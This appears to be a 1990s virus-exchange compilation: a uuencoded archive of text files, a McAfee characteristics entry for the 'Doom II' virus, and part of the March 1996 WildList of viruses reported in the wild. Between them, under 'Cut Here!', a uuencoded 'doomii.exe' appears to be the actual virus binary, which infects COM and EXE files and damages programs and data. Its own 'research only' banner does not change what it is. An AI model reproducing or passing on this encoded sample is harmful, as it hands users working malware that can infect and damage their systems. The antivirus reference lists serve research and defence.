M+WD$O33MD,'XY$[.H;"CA^/8>\-BPOX4$Q;]-OOEJ"-Q/FZ.^./]QB+HV\=K
MV.C;ZU8)4X\VNJK3)N)Y8BU]9>O9VV^([0MZ9<^_AQSX^;:=(3L<K$#BU6)$
M2-\I^N^-]'VO0.#RZB*+>`C?:".(CYB[;6\]"NMJ/V(-@_]]YBZ<[3%83_7'
M-Y+0^@B^*TD0BVA]:`VQ'M^0`[[,G;G!QV&]X`&@#<3KOV'NT-F?@/5K:T$'
MFL\H\_]IGOL>K/>O`ZOIBY`9S%VYAY^"=5L`R*)OSI6SZ#MUA1"83;M8`4%'
MXZ)"HCE'6,3ZER,.<T+#WN4$Q;*(GZ))+#N,'1X5_0$[ZA`[[FT.^R!S$9L=
M<00@L9QH"$T<AWT(Z%C$VL@P=`N,16"6P>]SPH'E_JBHP[&[$8!%_&C?T2.Q
M/V&'QW"`""8'.8<Y>!(5PX[AO!L1B^5%TLB!B,F.PU&QP#G`J1B+^"&M%E(F
M+#PNXETWG8!+'"<R^C`P9TB"WX^(8Q';_^MH1%PLV^N.6MB1@^SHF*C(:`#%
M1;%C@:V'B6#'.L1C#^<]%K%E!ZTSJ'>$\]X*(A]!7EV[.VC'OI!0`E&_LBMX
M3_`!"$=`T*O[0X)?"]X!FPC/0_8&[X$-$H!0@E][93\$!\]#@_X0#&$*1#@[
M=H6$!D.4USL!0:&P%]8#\:Y0+(1XZ?=[V;O"8!/_!R>._8O0B)]"W_T:>V\H
M^\477C@8'4'LVKO_Q5\3>T-W['ME[W[B;MCK_?_@OY/@$9O_!Z5.()']X"\#
M#B)#<"K1B?8T\1.8++&64ROP#G^K;Z_Y:5E_)/[H2FJ6QVAE+:<[Y^_&#B)^
M63KH%@]_;NUGQ!-/HNNQ^R,B8=_!+F3OBXH,.T(\!*M^1.@'D6]%'28>W(I0
M@F(BH*IN@0W%"DB";.^&S'\;\Q:&SR6BOM(=NS7$L4TK&_,#?S8S8RKE6N\[
MKKZNF/\_4$L#!!0``@`(`&&JC2!(>VC!,`$``$@#```+````0T],3U)3.2Y4
M6%2=4\U.@T`0OI/P#A/20XF)48\F'E"0]`!-"O&^P$C1A3'[T_C*OH6[I07:
M8J+N:<)\^_W,#@DK!4%.Q&5B2]=QG4P7D`2KU'7@<-8=1$*0@)@4]>6&M&HZ
MM/@!Q:N4M;B`!TBI?6[*;8-BL?2GF-4KM%9'7A<A%KJ&?(O=V#Z>1-:/]`F>
M5$RHB3WO$AHV+52\AD#"VE@:<ISC9I4'H=L9YAC5DQ8OC&N45N*OG'<SG*>3
MS-Z;C[E$C%,]KSB)V`,LQ?UO7NJ49[P1=97),7VC390`=JS@"$PKZA..[?!+
MLE(U.Q1[&S(P&+B9$AQFDK%=3C&G@O'E<3?\"Q05;VCIQL;>>DC]<DTC_)BS
M!_]SQW#/X\$59,JLJZ'U3>T!E:46`BMO;E96T=BQ'\SOXCK?4$L#!!0``@`(
M`%BJC2!!ST<ID0$``-T$```+````0T],3U)3."Y46%2=5,%N@D`0O9/P#Q/2
M@Z:IT1Y-:V)%C0=L4DSO"XRX+3!F=[']Y?Y%=T4*J%CCGG!VWIOWAB<>"P7!
MC"?HLQV.I6W9EI\'X(T72]N"PWG-8"H$"9B3HN+QC7+%,S3]9==B#:FAD[W`
MQ2"/8;7!##P9O]`W.%(QH6J3G#K4_9$L5'R'PMLSC',]I]_HX"E$20QCJ3G"
M#4<QS03&7"J!PJ=<5JUS5)-<O+,D1VDPU4W@DAF^(I=">(8'&+1YG+`LQ.2O
MN:Z#)10W:?<(_Y-O"Y1M':&'K0JTQ0HWO&'A#3ZS[^KVNM?"LV,:YY3B;>H!
M7X/4+1$P"5\D(HB,@]&^:&H*TVW"%)X5H-?5FY%(F3*F"P6-VN!_V*#%7WD.
M)K6/%<T3"EC2,?@EI=WK0-K[#0C=?0CD7:=[`7<^M<T@E6>:1=I^53_^?=!`
MP0>:?\U1$ETJ8E*/S;"1>#3R,8]!];=GJ-V%)46VH+&1=3>#JXC"7N>1RX
M!U_IQ6K:KGYV@,(P%P(CYYP.,U$;-07]#;.M7U!+`P04``(`"`!+JHT@--KH
M'\0```"%`0``"P```$-/3$]24S<N5%A4?5!+"H,P$-T+WF$(72B%'J`[6ZVX
MT$+U`B:FU:(9B(GT^$W\D$)I9_7(O'F?Y#63")%6>.YQY+[G>Z6FD$=9X7NP
MSE5`(B5*2%'A`F^H52>XXSB4W6&PJN.!QISJ!U0M%Y"/CQ.^@(RJELH9$NNX
M7:YG93U5F/9(ZSXH<+ATK.VXW`5A^$5%^N1,=9-;S!%C%'.5SZC'7WT6\M_T
M;KW-5H?/.@3V4"H3T<B&!A-`QK24O"'N-!&-4;>QK*.)8Q_,9_O>&U!+`P04
M``(`"``ZJHT@6,):H@4!``!4`@``"P```$-/3$]24S8N5%A4C9+12L,P%(;O
M"WV'0_%B19#II8@P:3=VD0GK7B#)CEVDRX'3=/C*OH5IVMD,A]JKD/_/_R7_
MJ9":"9:FP4J>,$W2I.H4B,5ZDR8P?J\62F9B6)&C8;FESAD;_&?7^@V.?5A[
MIPI470V[`UH0;?U"'Y"U3K+[YF3QP6TI`*U4#<*B<R1"R"07GZW4SIR0!Z7W
MP#P.&+$^>$<%Z=F&CDNC#P;Y9I;GUWVKAI1L_K*2>L>>'=-&?VD9:],Z1IZT
M4%!!0S%Q48\7/7D%GI[A?OX02IJT_S!*N_<9\8TNYS/@?YW*3^!Y3!AR,KB%
MROE*?&SNUQF0UATS[K-K]^B)_H']AO]YTN0+4$L#!!0``@`(`#6JC2`+:3O,
M[@```-P!```+````0T],3U)3-2Y46%1]4<MJ`S$,O!O\#\+TD*50<NXM93<A
M!Z<DFQ^P'35QV5C@M4-^N7]1>Q]UH+0Z"<UX1AI+93S!VG;8W&W@C+,V:I"K
M[8XSF.K=0>,]>=A0H+$]4`S68>&4;OL!URS:O^@:=3S#\8(.9']^HSN(/B@?
M?OQ$-IP?'AH)Z)3N$%0,-(H4N/[JE0GVAEX.R"IQ8/DH,-FVZG:D34=:=8L=
M7=?67"SZIT55_:*2_L2L68")O8\V!/1E/IQ>4SZ9L\<(7O_*:23_FTJ!YYIC
MPD%'P#.T(:V>9*O4"R!CHO=X$N5IXTY)/:^5'=,Z>9`^D;-O4$L#!!0``@`(
M`"^JC2#2:8R%Q@```(,!```+````0T],3U)3-"Y46%1]D$$*PC`01?>!W&$(
M+BR"!W"GJ*6+MF"]0!.C1MJ,I$GQ^":V-8+HK(;,_/_?)*^%05@[B^5=:DHH
MJ1R'?)T5E,!8I8:=,6@@18M#>T!GE99Q)W;9&=I@VBWY5G)W@>-5:LB[RP8?
MP#I;&_O.8R%P$HZJJNZ/F#;(ZV9>8+M7XJJDF<V3Y&L5^4T*J_HX>!%N,9!1
M\DFZ^G7.L/P7/HZGFJZ1+Q\&"ZBL1_2VB>\9H!#.&'EB4;K3)^\>L$*BQPD/
M_J\I>0)02P,$%``"``@`)*J-($JQC8XW````/@````L```!#3TQ/4E,S+E18
M5/--3"[*5W`L+<EWK4A-YN7BY0HN35+P=?3TX^52@((@5U^%E-+<W$J%7)!J
M7B[7O!0%H#)>+@!02P,$%``"``@`&*J-(,Y/OI\U`0``W`(```L```!#3TQ/
M4E,R+E185(5236N$,!"]"_Z'07I8*2QNCZ4MV&IE#UI8E]ZC3EU+="`FMC^Y
M_1=-_$!EEZVG.._->WF9B5DN"%XKC@E^V99MI2J#V-\GM@7C]]9`*`0)B$C2
M<#R0DE6#AC^Q]A]0&ZUVFP68J1*.)VP@;LMG^@:GE4S(R<99]AW"&+!A&4?P
ME:2XUYCAX+=EN:PZ%`-B..`M!8*JAH*7X+=:/S]5*!)2'3(U4R*4+TJ\,ZZP
M-=QE,^-4KFLZB?[?&I68BA]]L4?PACAG]=W<MC8?)&=T?)N4=4<**-\D5(\-
M-QO7O<R+.&6,_T>E[!/-"RW=^DD%-$QH.;'[54R-P,,3[+R[/MZ,7<LT86%3
M:(VEZWI1!ONKZW%N..T+]CH.W$(J=6PMZ^JS`Y3G2@@LG$OW,(XZH"GH+;:M
M/U!+`P04``(`"``.JHT@1'@2*3L%```C&0``"P```$-/3$]24S$N5%A4[5C;
M3N-($'U'XA]*%A+)#K!Q$AA`F@<N@<U#PHI$,\^.4PG-..ZHW0;R]],77]JQ
MVTXT$KM:+0\0VJ>KJD]5GRIGY/F,PDK^C@X/#@\F\0Q&'@D/#P;A',1_<O$A
M#GU.:`BS>YS%R\,#2'[T__`-.AJ?`N6F>[*"R8O'<`[1'0THBXY:7;>=.J&S
M5Q38M]S84P@#QBB#1\JI_/C,0U?"4\!PD3J<OF`(HVAY2S_`B;C'>&;/,7=$
MWSUV),)[1/XWHPL2X(0S$BZ/6LX[">?T/7).P/%I'')D4>RT\ZWD3J^*W=^]
MH*4LM1MC27=]<^`+"%]'K73%V#O9B@:J@SDI&A`&-7N6$!1KMS@F/AJG&+PA
MVX@S]#H=8W5$Y^F#S/PIM(8AS]W]F6QNPQ_I)YOO?#W]R?A(/1F$I$N&.5D[
MPT7!O!EC*SG&J6#`XK"\DA5=IRU,.+>>_W/)Q-GF3@W65=B;]?H'93^CM>=C
M';JKT#]4\NIP/0,WQ0]>A^TK[`C#N`YUGJ&:[%WH$\FK@5/"@]H#?57@8>CM
M!K]4<`5K"N/*"..6LCFRVC1T"H'LL,$U*'Y@WJHV;E<G;B)$+PAF7KUEG;S;
MF',:/C04A-LWP$+\&NK"/3?@30RZ.I./S-LT0G4>_R(!6;[4(R]-9*/=JW)]
M-.WI=HPSVB,JKSR(3D!D:X$IA6ZG#+#):4MHJ/0M!#2+@K03-942]QS.6U+5
MNN<7[;:0)0<R<=KW<;L<UE@0`J2L;5J:K_,'2K#O:8BJR27][MK6#Q/@O@*,
MRD)V`&%0'XGZ?LQ$;W;*@8K6+7U=%T8`HYN3*>5>,!9W+"IV>;4DKWIQ>:2&
MB]+Z;!B*SAT$."\]2=2J"-!C@TAVXKEN;.B:?=*(5Y33E3$=)`'K"KV).7U:
M8^B4`5I<'F2%>6]X$U5`M*+H.:KB<2]S,?A`OP*@A6-*::#YJH"<9S;N`AIA
M!>*B$&<%X&L&&'P07@&XS`!C-*4K*\%N7JO=VEKM?F*M=HNUJNK$>YO2QX#.
MQ.PVVLC3F=-;5<WT[+.5/60]>QK.'#LV"4--0LGG,IC(^H@YZIDZ.VX082W6
MK:+&$,CM.Q-S$D1/:SFK1X.0X9)$G.$*0PYGP_"-<-3'N:=<1W)X<)SL?1Z,
M($($LH!W9`A>P-";;X"DMU5\@J7:#1Q7Z\#CF.\FJKK5C"D,J[]:'UJ=$^BT
M<V`J_ZZ4?V-7CC`;Q6O:*,S+?BII.;9T#9%A953EH46$<^E?F$FOPFLZ:MHL
M9"]!N4Z]2@.U;M/L'%=UC==\/>TB><YVXETW9H-WL/"^6G-,B'<U\=!(/.Q%
M/-B)'].5LJMX=VV\0Q/OI3:1TP\-](.%?K#2'XU0ODF6+FYA3&DD(6N&1!U9
MVA0*=RTE(3T_:9>K0W'&S4HC3=69)&Z],7V*]TM]K[<\GF1:4C9HHTS6(PV#
M#<PQ0)[4);R(Q@,>^,)Q>8M4U5+22%.^,[%^QBA>H<I-#5I)FSHRG(E",RI+
MGO/L9K$@_HMZKQ>5=S:)UVM&5LAV\%]L%C7U7=LZ*MJ#*RO+F>&"BGNM9@C)
MG^J$1O)V,M55IDXJLRQ+[21_#T\ROIM=V<%TI%^TF_WOV'9E$MRW-'>C/)\G
M1""*2$5I/EA44;D=]/84G\TUO7P`ZM4.0+U/'(!ZE@'HGOH[3C_]WYQ^A*?_
M[NC34&<+PB(.`:5KY_^&_:]IV+9OB]&GPF:2K7^DNX.EN^_?&@TIM:EG06+M
M4FKC^3>D-4_)6,<857WYT<_UM%^KI_U/U-.^J:>_`%!+`P04``(`"`#QJHT@
M:Z:,[&<$``!V"@``"@```$-/3$]24RY46%2M5DUOVT80O1/@?QCDDC:0Y;A)
MVKI!#X:3`@9BNT@-^%#TL"*'XL;D+K&[%*7\^K[9)67*EF^1`!VTL_/YWILE
M.OZYMZZ\5H6SIY>VL<[G6?K>U=I3*P>TT:[W-"A/G?6!2PJ6%/6>#0<R//BU
MLWU'UE"HF<[>AYIL1;=%L"MVBSP[.S__L*2K0/"H&F_IP=C!$/R)_5>ES<H.
M*<J2GL75IN(BL(^9YEEIB[YE$^0`67C=ZD8YW#"&W>2S<[S1MD]WYM[8+XBW
M!7<AST*MD%*@TL*YL8$<-SM4$7^B&]4'>\);+OK`R8N7VFW'3@667'N_$$=(
M>6R2;AI:X>:J83&=+O.&#>EJ[W5TIARL>F?04UM5RSQ+,Z#"FH"VI&(JVS1V
MT&8]IO"'C.?-#_KDV02$"Z1UV5C/3Q%2Q)Q^6X9M.+3^C.+HN/6[Y]:W'5IP
MW/K]H?5?NN'/6TSFN/6'Y]8W/-`+UK\\M_Y';?@%ZU^/6U_XH]:_'UK?6=OX
MR*6CUN>'UB,$7LK[+%G_N#E?`)DSV+$IW*X3-@\:A!6@^:!,J4"8R)H1NB>1
M$!4KX)27`KW[&H-49B)F21,EA=_@!M"\B/YFE)AX,,A=T-!%$*/8-W3IX!L,
M5"(E5*'CTX&`,5%@'VIV+',9"8(_Z2>AE9?)1CY'3B:F!5VH!C6H*D`AYN[&
M8>SSKR$?*T:&4@5XY\C;%@S5+?\\1OVB??!3'_>=BY,_3:,O;`LQ*J6^)'FZ
M[:Q#:T,4&8@"ZG_IEAP7-1</(A8[V\NH\FQ?_AAPDIN%Z)U8Q1Y_ZWW8-WK6
M_UK:4UH(2)(J2+&!C"M,23(1C)_><=LU,H;36[=61G]GEQ+S\\Q*#LB#8G4E
M-SS&@72Q*1\%:DF?K-0JIY!8154OX#G<)L@XSSIG5Y#*'?E^M6$74FU31!0W
M<-,LTSJ:ZFDAC$D<%:T!-DBQAEX7MC<R7VR%^ZN;Y=7-U4+0AK"*&FW0Q5>C
MB>_ISU=B)[G_"V$M[>#_HTZY-"X0@Y477/=.BA*SU%:)8ROI(N]+O8BH@KZ[
M';U[^Q;$B0[2BGK"@M:6NMHEKNTP@C;/(MG)<P@(Y3_&LR0`LD-A7J$$0.<^
MI4EV]0TC>%PT1:W,.J[D/'-HFFVGZPGNAK>!5M:&D[X;EZLJ@MZDIF%O(RXG
M;X+.P;J'/.M-B:O76BJT54AZ('0`)-!\Z^OE#-[24_8AMFH^=REEOR;2[,>F
MCXO=$U`7=O(T`,;QNIC0@`XV?8FJ(J1EXZ*]@]/P#-WAK4[1GC@_$:@7=9ZU
M>EV':8<F"H-].D4=2\;DGKY\TMN$C>SN.+H\VPO(`0#F&SSM]!VD`\H3M:/4
M7CR`79$UV.XRRA$UKU$C:I::HE:E\<57Q<WMU^N++\M/MW>O)[E=8'+I,14K
M>PR"$?GT#JMBK0<OG"323XOSS&V,(Z"!JE2]:*(T-;#Y2(_\BD\544(%OJ]Z
MB`9@B["];L*)-LN9Z7QFHR<9\=^0NWZMA+C_`U!+`0(4`!0``@`(`&&KC2!O
M&XI%)P(``!\&```+``````````$`(`````````!214%$7T]2+D1)15!+`0(4
M`!0``@`(`-Q%4Q_\_N@,=Q(````Z```,````````````(````%`"``!204E.
M0D]7,BY$3T-02P$"%``4``(`"`!AJHT@2'MHP3`!``!(`P``"P`````````!
M`"````#Q%```0T],3U)3.2Y46%102P$"%``4``(`"`!8JHT@0<]'*9$!``#=
M!```"P`````````!`"````!*%@``0T],3U)3."Y46%102P$"%``4``(`"`!+
MJHT@--KH'\0```"%`0``"P`````````!`"`````$&```0T],3U)3-RY46%10
M2P$"%``4``(`"``ZJHT@6,):H@4!``!4`@``"P`````````!`"````#Q&```
M0T],3U)3-BY46%102P$"%``4``(`"``UJHT@"VD[S.X```#<`0``"P``````
M```!`"`````?&@``0T],3U)3-2Y46%102P$"%``4``(`"``OJHT@TFF,A<8`
M``"#`0``"P`````````!`"`````V&P``0T],3U)3-"Y46%102P$"%``4``(`
M"``DJHT@2K&-CC<````^````"P`````````!`"`````E'```0T],3U)3,RY4
M6%102P$"%``4``(`"``8JHT@SD^^GS4!``#<`@``"P`````````!`"````"%
M'```0T],3U)3,BY46%102P$"%``4``(`"``.JHT@1'@2*3L%```C&0``"P``
M```````!`"````#C'0``0T],3U)3,2Y46%102P$"%``4``(`"`#QJHT@:Z:,
M[&<$``!V"@``"@`````````!`"````!'(P``0T],3U)3+E185%!+!08`````
.#``,`*P"``#6)P``````
`
end
sum -r/size 51452/10904
---------------------------------------------------------------------------
VIRUS CHARACTERISTICS LIST B95
Copyright 1989-1992 by McAfee Associates
All Rights Reserved.
TEL 1-(408) 988-3832
The following list outlines the major characteristics of the known
IBM PC and compatible virus strains identified by SCAN. The number
of known variants of each virus is also listed. This number is listed
in parenthesis beside the name of the strain. The total number of
known viruses is summed at the end of the list. The Clean-Up virus I.D.
code is included in brackets.
==========================================================================
A Infects Fixed Disk Partition Table-A-------------------+
9 Infects Fixed Disk Boot Sector-----9-----------------+ |
8 Infects Floppy Diskette Boot-------8---------------+ | |
7 Infects Overlay Files--------------7-------------+ | | |
6 Infects EXE Files------------------6-----------+ | | | |
5 Infects COM files------------------5---------+ | | | | |
4 Infects COMMAND.COM----------------4-------+ | | | | | |
3 Virus Installs Self in Memory------3-----+ | | | | | | |
2 Virus Uses Self-Encryption---------2---+ | | | | | | | |
1 Virus Uses STEALTH Techniques------1-+ | | | | | | | | |
| | | | | | | | | | Increase in
| | | | | | | | | | Infected
| | | | | | | | | | Program's
| | | | | | | | | | Size
1 2 3 4 5 6 7 8 9 A |
| | | | | | | | | | |
Virus Disinfector V V V V V V V V V V V Damage
-----------------------------------------------------------------------------
Doom II [Dm2] Clean-Up . . x . x x . . . . 2504 O P D L
LEGEND:
Size Increase:
N/A - Virus does not attach to files.
None - Virus does not change file size (attaches to tag end of file)
Overwrites - Virus overwrites beginning of file no file size change
All Others - The length in bytes by which a file will increase when infect
Damage Fields:
B - Corrupts or overwrites the boot sector
D - Corrupts data files
F - Formats or overwrites all/part of disk
L - Directly or indirectly corrupts file linkage
O - Affects system run-time operation
P - Corrupts program or overlay files
Disinfectors:
Clean-Up - Clean-Up universal virus disinfector
SCAN /D - VIRUSCAN with /D option
SCAN /D /A - VIRUSCAN with /D and /A options
MDISK /P - MDISK with "P" option
All Others - The name of disinfecting program
Cut Here!
----------------------------------------------------------------------------
begin 644 doomii.exe
M35JH`08``0`@````__\-```$`````3T`(@````$`^R!R:@$`````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M````````````````````````````````````````````````````````````
M``````````````````````"X`@".V+H``+0)S2&ZG0"T"<TANHX`M`G-(;C_
M3,TA``T*071T96YT:6]N.B!4:&ES('9I<G5S('-A;7!L92!U<V5S(&]N;'D@
M:6X@<F5S96%R8V@@=&5A;7,N#0H@("`@("`@("`@(%!L96%S92!D;R!N;W0@
M=7-E(&EN(&IO:VEN9R!O<B!S971T:6YG('1R87`@;VX@<V]M96]N92X-"@T*
M5V%R;FEN9R$@(B0B(&-O;65S(&EN(0T*!R1$3T]-($E)(%9I<G5S)```````
M4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-404-+
M("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-4
M04-+("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@
M(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#
M2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@("!3
M5$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@
M("!35$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!
M0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@
M4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-404-+
M("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-4
M04-+("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@
M(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#
M2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@("!3
M5$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@
M("!35$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@4U1!
M0TL@("!35$%#2R`@(%-404-+("`@4U1!0TL@("!35$%#2R`@(%-404-+("`@
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
.:$U,1U$.`FQA=PPH+P8`
`
end
SR News: Viruses in the Wild
SR News: Viruses in the wild
The following list is maintained by Joe Wells of IBM anti-virus
development. (Thank you, Joe!) Several companies including Stiller
Research provide the reports that build this list. If you have had a
virus incident please send us or one of the other companies listed below
a note describing the virus and what product you used to identify it.<g>
============================================================================
PC Viruses in the Wild - March 15, 1996
============================================================================
This is a cooperative listing of viruses reported as being in the wild
by 37 virus information professionals. The basis for these reports are
virus incidents where a sample was received, and positively identified
by the participant. Rumors and unverified reports have been excluded.
This report is cumulative. That is, this is not just a report of which
were seen last month. Monthly data is received from most participants,
but the new data is added to the old. Participants are expected to let
me know when I should remove their name from a virus that they haven't
seen in a year and a half or so.
The list should not be considered a list of "the most common viruses",
however, since no specific provision is made for a commonness factor.
This data indicates only "which" viruses are in the wild, but viruses
reported by many (or most) participants are obviously widespread.
The WildList is current being used as the basis for in-the-wild virus
testing of antivirus products by Virus Bulletin and the NCSA (National
Computer Security Association). Additionally, a virus collection based
upon the WildList is being used in an effort to standardize the naming
of common viruses.
The WildList - (c)1993-1996 by Joe Wells - wildlist@vcnet.com
============================================================================
The section below gives the names of participants, along with their
geographic region, organization, and antivirus product (if any). The
locations with an asterisk (*) note that the reports are regional, all
others being multinational or global.
Key Participant * Region Organization Product
============================================================================
Ac Alan Candy * New Zealand Applied Insight F-Prot Pro
Ad Allan Dyer * Hong Kong Yui Kee Co. Ltd. F-Prot
Ae Amir Elbaz Israel EliaShim ViruSafe
Cj Craig Jackson USA Datawatch VirexPC
Cs Christian Schmid * Austria DataPROT Linz F-Prot
Dc Dave Chess USA IBM IBM AntiVirus
Dg Dmitry Gryaznov UK S&S Int'l Dr. Solomon's
Ek Eugene Kaspersky * Russia KAMI AVP
Ev Eduardo Velasquez * Colombia/Vene. SOFTEAM Ltda VirusCOP
Ew Eddy Willems * Belgium/Lux. De Vaderlandsche None
Fl Ferenc Leitold * Hungary Hunix Ltd. Virus Buster
Fs Fridrik Skulason Iceland Frisk Int'l F-Prot
Gm Gerard Mannig * France RECIF None
Gp Gabriel Pislaru * Romania SoftWin AVX
Iw Ian Whalley UK Virus Bulletin None
Jd Joost de Raeymaeker * Portugal RSVP Dr. Solomon's
Jk Jimmy Kuo USA McAfee ViruScan
Ks Klas Scholdstrom * Sweden QA Informatik Dr. Solomon's
Ls Luca Sambucci * Italy I.C.A.R.O. None
Mh Mikko Hypponen * Finland Data Fellows F-Prot Pro
Ms Marek Sell * Poland APEXIM MkS_vir
Oh Omar Herrera * Mexico Escuadron AV Aguila AV
Pb Pavel Baudis * Czech Republic Alwil Software Avast!
Pd Paul Ducklin UK Sophos Plc. Sweep
Ra Ruben Arias * Argentina RALP Integ Master
Rf Richard Foley * Ireland Reflex Magnetics TBAV
Rk Richard Ku * Taiwan Trend Micro PC-cillin
Rr Roger Riordan Australia CYBEC VET
Rt Roger Thompson USA Thompson Network Doctor
Rv Robert Vibert * Canada Sensible Security D. Solomon's
Sc Shane Coursen USA Symantec NAV
Sg Sarah Gordon USA Command Software NetProt
Sm Seiji Murakami * Japan Jade Corp Scan Vakzin
Td Toralv Dirro * Germany U of Hamburg None
Ws Wolfgang Stiller USA Stiller Research Integ Master
Yp Ywain Penberthy * So Africa CSIR Virus Lab VPS
Yr Yuval Rakavi * Israel BRM Untouchable
============================================================================
The WildList
============================================================================
This main list includes viruses reported by multiple participants, which
appear to be non-regional in nature. Technically, this first list is "the"
WildList according to my original specification, which required viruses to
be verified in the wild by a minimum of two participants. A supplemental
list follows that contains viruses reported by single participants.
If a virus listed has minor variants, but no specific variant letter is
attached, the virus meant is the .A variant.
Viruses marked with a plus sign (+) are new to the main list this month.
CARO Name of Virus [ Alias(es) ] Reported by:
============================================================================
15_Years................[Espejo, Esto...] AeDcDgEvJkRtScSg
Accept.3773.............[...............] RaYr
Aircop.Standard.........[...............] OhRk
+Alfons.1344.............[...............] FsRr
Anticad.4096.A..........[Plastique 5.12.] JkSg
Anticad.4096.Mozart.....[Invader........] DgFsJkSg
AntiCMOS.A..............[Lenart.........] AcAdCjDcDgEvEwFlFsGmIwJdJkKsMhMs
(continued) PdRtRvScSgSmWsYpYr
AntiCMOS.B..............[LiXi...........] AdMsScSmTdYr
AntiEXE.A...............[D3, Newbug.....] AcAdCjDcDgEvEwFlFsGmGpIwJkKsMhMs
(continued) PdRfRkRtRvScSgSmTdWsYr
Arianna.3375............[...............] DcDgLs
Avispa.D................[...............] AeJkRaRtSc
BackFormat.A............[Backform.......] DgFlFsJkMhYr
Baclab..................[NTU.T4, Crawber] RtSc
Bad_Sectors.3428........[...............] FlGpYr
Barrotes.1310.A.........[Barrotos.......] DgEvGmJdJkPdScYp
